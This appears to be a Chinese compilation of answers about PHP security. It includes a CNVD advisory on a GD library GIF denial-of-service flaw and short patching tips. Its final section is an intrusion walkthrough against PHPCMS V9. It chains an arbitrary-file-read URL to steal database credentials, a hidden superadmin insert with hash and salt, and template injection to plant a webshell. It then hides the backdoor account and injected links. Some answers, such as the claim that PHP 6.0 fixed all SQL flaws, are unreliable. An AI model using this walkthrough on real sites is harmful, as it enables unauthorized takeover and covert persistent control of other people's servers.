本文目錄一覽:
- 1、用什麼工具檢測php網站是否存在注入漏洞?
- 2、PHP GD Graphics Library拒絕服務漏洞
- 3、php如何打漏洞補丁?
- 4、php漏洞修復
- 5、iis7.0解析漏洞 php用什麼軟體檢測
用什麼工具檢測php網站是否存在注入漏洞?
PHP的安全性現在是越來越好了PHP6。0版本都把存在的SQL漏洞都解決了
但是為了安全起見還是應該做安全檢測
檢測方法:SQL 注入法 、腳本代碼、參數傳遞等方法 具體情況參看PHP官方網站 安全篇章
PHP GD Graphics Library拒絕服務漏洞
關於PHP GD Graphics Library存在拒絕服務漏洞的安全公告
時間:2018-02-02
2018年1月18日,國家信息安全漏洞共享平台(CNVD)收錄了PHP GD Graphics Library存在拒絕服務漏洞(CNVD-2018-02505,對應CVE-2018-5711)。綜合利用上述漏洞,攻擊者可以構造惡意GIF文件,遠程利用PHP函數形成無限循環的方式發起拒絕服務攻擊。目前,漏洞利用代碼已公開,且廠商已發布漏洞修復版本。
一、漏洞情況分析
PHP(超文本預處理器)是一種通用開源腳本語言。GD Graphics Library(又名libgd或libgd2)是一個開源的用於動態創建圖像的庫,它支持創建圖表、圖形和縮略圖等,廣泛應用於PHP語言的開發。
該漏洞觸發的前提條件為受影響版本的PHP,並且使用了libgd庫,漏洞文件存在於ext/gd/libgd/gd_gif_in.c。在「LWZReadByte_」函數存在一個循環(while-loop),該循環里「GetCode_」函數會調用GetDataBlock來讀取GIF圖片中的數據,但由於「GetCode_」函數未能正確處理int到unsigned char的類型轉換,導致PHP在解析特定GIF文件調用PHP函數imagecreatefromgif或imagecreatefromstring時出現死循環,從而導致伺服器計算資源大量消耗,直至崩潰宕機。該漏洞允許遠程攻擊者利用該漏洞導致拒絕服務攻擊。
CNVD對上述漏洞的綜合評級為「高危」。
二、漏洞影響範圍
PHP 5 5.6.33版本
PHP 7.0 7.0.27版本
PHP 7.1 7.1.13版本
PHP 7.2 7.2.1版本
三、漏洞修復建議
目前,廠商已發布升級新版本以修復該漏洞,最新版本下載鏈接。
附:參考鏈接:
php如何打漏洞補丁?
首先那些檢測漏洞的網站也別太當真,很多都是胡扯,我還遇到過開放80埠也算是高危漏洞的檢測咧,按他們說的只有拔掉伺服器電源才是最安全的。
另外如果真的有漏洞,那也是程序代碼上的漏洞,一般不可能是php版本的漏洞,從來沒聽過有什麼漏洞通過升級php版本就能解決的。
你是不是那這個漏洞當成了windows漏洞一樣,打個補丁升個級就修復了,就算是打補丁升級,也是升級你的代碼。
php漏洞修復
打開php配置文件,php.ini,然後在裡面搜索dll,把你下載的布丁照著格式複製一行就行了。比如你下載的補丁為abc.dll;就加一行extension=abc.dll
iis7.0解析漏洞 php用什麼軟體檢測
本文利用了PHPCMS V9的兩個漏洞,一個是讀取任意文件漏洞,另一個是模版運行php腳本漏洞。使用到的工具:Navicat for Mysql/IE瀏覽器(建議使用代理)/湛藍v9代碼包(包含文中使用到的所有文件、代碼和木馬)
1、放置data.txt以備在目標站點讀取並在目標站點生成PHP木馬腳本使用。
例如將data.txt放置在yun.baidu.com/j0192/data.txt
2、通過v9漏洞獲取配置信息(請參閱:phpcms V9最新讀取站點任意文件漏洞)。
/index.php?m=searchc=indexa=public_get_suggest_keywordurl=asdfq=../../phpsso_server/caches/configs/database.php
3、通過v9系統漏洞獲取到的資料庫信息遠程登陸目標站點資料庫,在v9_admin和v9_sso_admin表中添加賬號
username欄位:admn
password欄位:10203d4623c1957d041818196ff9822a
encrypt 欄位:bGV22e
issuper 欄位: 1
4、通過資料庫添加管理員賬號後使用以下用戶名密碼在後台登陸,然後修改當前用戶密碼。
用戶名:admn
密碼:123456
5、ctrl+a複製write.php全部內容粘貼進v9默認模版下的footer.html保存,然後點擊footer.html的可視化運行該模版中的腳本,到此時就完成在目標站點生成木馬腳本。
6、打開ifeng.com/caches/caches_template/default/wap/data.class.php
用戶名:admin
密碼:admin
7、隱藏新增加的管理員。
通過木馬腳本上傳替換/phpcms/modules/admin/admin_manage.php(默認匹配%admn%),然後登陸目標站點後台查看管理員列表是否還有用戶名為admn的超級管理員,如果沒有則表明我們完成了新加管理員的隱藏。
8、隱藏新增加的關聯鏈接
通過木馬腳本上傳替換/phpcms/modules/admin/keylink.php((默認匹配%skyhome%))
9、將目標網站的漏洞修復,以防其他黑客入侵。
通過木馬腳本上傳替換/phpcms/modules/search/index.php
防黑參考:
1、關閉資料庫遠程訪問。
2、靜態文件及附件等文件目錄禁止執行許可權。
3、腳本文件目錄禁止寫許可權。
4、系統後台等重要目錄限制IP訪問。
5、及時關注開源系統官方補丁升級和烏雲、sebug等漏洞發布平台,修復系統漏洞。
原創文章,作者:簡單一點,如若轉載,請註明出處:https://www.506064.com/zh-tw/n/130866.html